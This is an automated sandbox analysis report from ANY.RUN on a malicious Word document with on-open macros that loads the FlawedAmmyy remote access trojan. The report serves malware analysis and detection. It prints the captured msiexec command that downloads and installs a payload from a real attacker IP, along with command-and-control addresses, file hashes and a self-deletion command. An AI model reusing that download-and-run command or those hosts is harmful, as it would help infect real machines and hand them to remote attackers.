analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

temp_1545300399719.-2117284857.doc

Full analysis: https://app.any.run/tasks/13ef1e38-cc54-4e4b-942e-ac99e7e0804f
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 08:28:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
exe-to-msi
rat
flawedammyy
ammyy
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:07:00 2019, Last Saved Time/Date: Mon Feb 18 20:07:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0
MD5:

93E5AF41B2994E60FE1655994DCC1FC3

SHA1:

0DF9F97D57786EBDC54C95218DE8BB762E32ABBA

SHA256:

32318477E1C624E585C61546FAE2059D2FF8F3732A988E890665C2D81B3651CC

SSDEEP:

768:5pMLELemEgZnQgW5tmhdMgNMVkefr0VTEJ6eSX:5LLemXZQgW5IYgNlPoJ6vX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2988)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2988)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3560)

    • Downloads executable files from IP

      • msiexec.exe (PID: 3560)

    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 2296)
      • wsus.exe (PID: 3512)

    • Loads the Task Scheduler DLL interface

      • MSIF796.tmp (PID: 3620)

    • Changes the autorun value in the registry

      • MSIF796.tmp (PID: 3620)

    • Loads the Task Scheduler COM API

      • MSIF796.tmp (PID: 3620)

    • Connects to CnC server

      • wsus.exe (PID: 2296)

    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 2296)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3560)
      • MSIF796.tmp (PID: 3620)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3560)

    • Creates files in the program directory

      • MSIF796.tmp (PID: 3620)

    • Starts CMD.EXE for commands execution

      • MSIF796.tmp (PID: 3620)

    • Creates files in the Windows directory

      • MSIF796.tmp (PID: 3620)

  • INFO

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3560)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2988)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2988)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3560)

    • Application was dropped or rewritten from another process

      • MSIF796.tmp (PID: 3620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: 1
Subject: -
Author: 1
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:18 20:07:00
ModifyDate: 2019:02:18 20:07:00
Pages: 1
Words: 23
Characters: 137
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 159
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 1
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msif796.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs cmd.exe no specs wsus.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\temp_1545300399719.-2117284857.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2208"C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://185.17.120.235/select /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3560C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3620"C:\Windows\Installer\MSIF796.tmp"C:\Windows\Installer\MSIF796.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
2296"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSIF796.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
3532"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF796.tmp >> NULC:\Windows\system32\cmd.exeMSIF796.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3280"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF796.tmp >> NULC:\Windows\system32\cmd.exeMSIF796.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3512"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
Total events
1 260
Read events
818
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE91C.tmp.cvr
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD8379B708F70B55C.TMP
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF29514A58C19868C7.TMP
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF82147DD6E2DC22EA.TMP
MD5:
SHA256:
3560msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF420706D6EE43776B.TMP
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:69228A070D53A0BE0114433B362E75D8
SHA256:C8B7909C79956341B2621617F86348779D14F295FE02B2F5A003E2DF7CFE5207
2988WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E19279658F5878C3F7E1BE1A1A466AB0
SHA256:E047B13A3169186D4D065FAF0C8D719E5386FBFCAC2620B1F5F7C86B7A012575
3560msiexec.exeC:\Config.Msi\20f5d0.rbs
MD5:
SHA256:
3560msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF06673263FF5DC569.TMP
MD5:
SHA256:
3560msiexec.exeC:\Windows\Installer\MSIF38C.tmpexecutable
MD5:C19F4137DA7C2D9E5A6A26EFE3FC0F9A
SHA256:10987FB8AB8275F9DE9B8F4F1434CAC08D03B659BF69F81FDB5659F7A0253079
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3560
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
3620
MSIF796.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat1.omg
RU
binary
657 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3620
MSIF796.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
2296
wsus.exe
185.99.133.2:80
Zappie Host LLC
NZ
malicious
3560
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3560
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3560
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2296
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
2296
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
2296
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
2296
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSIF796.tmp
C:\ProgramData\Microsofts Help\template_e0e330.DATAHASH
MSIF796.tmp
--End Dowload--
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
temp_1545300399719.-2117284857.doc